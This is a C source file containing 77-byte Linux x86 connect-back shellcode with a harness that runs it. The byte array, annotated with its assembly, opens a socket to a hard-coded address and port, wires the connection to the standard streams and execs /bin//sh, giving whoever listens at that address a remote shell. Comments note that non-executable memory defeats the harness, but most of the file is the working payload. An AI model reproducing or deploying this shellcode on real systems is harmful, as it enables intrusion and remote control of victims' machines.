/* 77 bytes connect-back shellcode - linux-x86
* - by bighawk (bighawk@warfare.com)
*
* This shellcode connects back to you
*
*/
#define IPADDR "\x31\x03\x03\x07"
#define PORT "\x27\x10"
char code[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x68\x7f"IPADDR // push dword IPADDR
"\x66\x68"PORT // push word PORT
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe6" // mov esi, esp
"\xb0\x10" // mov al, 16
"\x50" // push eax
"\x56" // push esi
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xfb" // mov ebx, edi
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop duploop
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80"; // int 80h
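/*
 * Test harness from the original listing: prints the length of code[] and
 * then transfers control to it through a function pointer.
 *
 * Returns 0 if the call through the pointer ever returns.
 */
int main(void) {
    /*
     * code[] is an ordinary writable data object. Where data pages are mapped
     * non-executable (NX / W^X), this call faults instead of running the
     * bytes; that mitigation is what stops this class of harness.
     */
    void (*a)() = (void *)code;

    /*
     * strlen() returns size_t, so the conversion must be %zu; the original
     * %d was a format/argument mismatch. The count stops at the first zero
     * byte, so it is only the real length when the array has no embedded NUL.
     */
    printf("size: %zu bytes\n", strlen(code));

    a();
    return 0;
}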